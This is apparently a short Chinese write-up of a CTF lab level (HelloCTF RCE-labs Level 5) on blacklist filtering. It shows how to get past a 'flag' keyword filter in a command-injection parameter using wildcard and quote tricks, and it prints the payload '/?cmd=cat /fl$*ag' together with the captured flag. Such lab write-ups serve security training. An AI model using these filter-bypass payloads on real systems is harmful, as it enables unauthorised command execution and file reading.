HelloCTF [RCE-labs] Level 5 - 黑名单式过滤

开启靶场,打开链接:

GET传参cmd,且对flag字符串进行了过滤

\*绕过,fl*ag

用'绕过,f''lag或f'l'ag

当然还有别的方法绕过,就不一一赘述了(已经写了文档了《过滤绕过方法》)


/?cmd=cat /fl$*ag

成功得到flag:

NSSCTF{132e1f48-9cc3-4a6f-8608-91f32a8fa6f6}

相关推荐
leoZ23142 分钟前
AI 辅助开发的五道坎
开发语言·人工智能·视觉检测·bert·php·超分辨率重建·openvino
2501_915921431 小时前
抓包鹰 Traceeagle 解除证书绑定,SSL Pinning 解除
网络·网络协议·网络安全·ios·adb·https·ssl
qq_452396234 小时前
第十二篇:《Istio 生产环境最佳实践与排错指南》
云原生·php·istio
小绫网络安全5 小时前
【2026最新版】网络安全入门路线
安全·web安全
上海云盾-小余6 小时前
全域网络安全防护思路:借助分布式节点抵御异常访问实战
分布式·安全·web安全
不爱土豆唯爱马铃薯9 小时前
升级 AiPy Pro 2.0 后,我把安全中心这几项挨个打开了数据安全、沙盒权限、工作空间隔离——这些 2.0 新功能对科研协作场景的实际影响
网络·安全·php
MC皮蛋侠客9 小时前
TDengine C++ 系列(11):性能模型与调优——从测量到优化
c++·php·tdengine
小绫网络安全9 小时前
【每日一讲】Pikachu漏洞练习靶场
网络·web安全·网络安全·靶场·pikachu
Yan_chen66610 小时前
CTFHub XSS反射型实战攻略
前端·网络安全·漏洞·xss·ctfhub web前置技能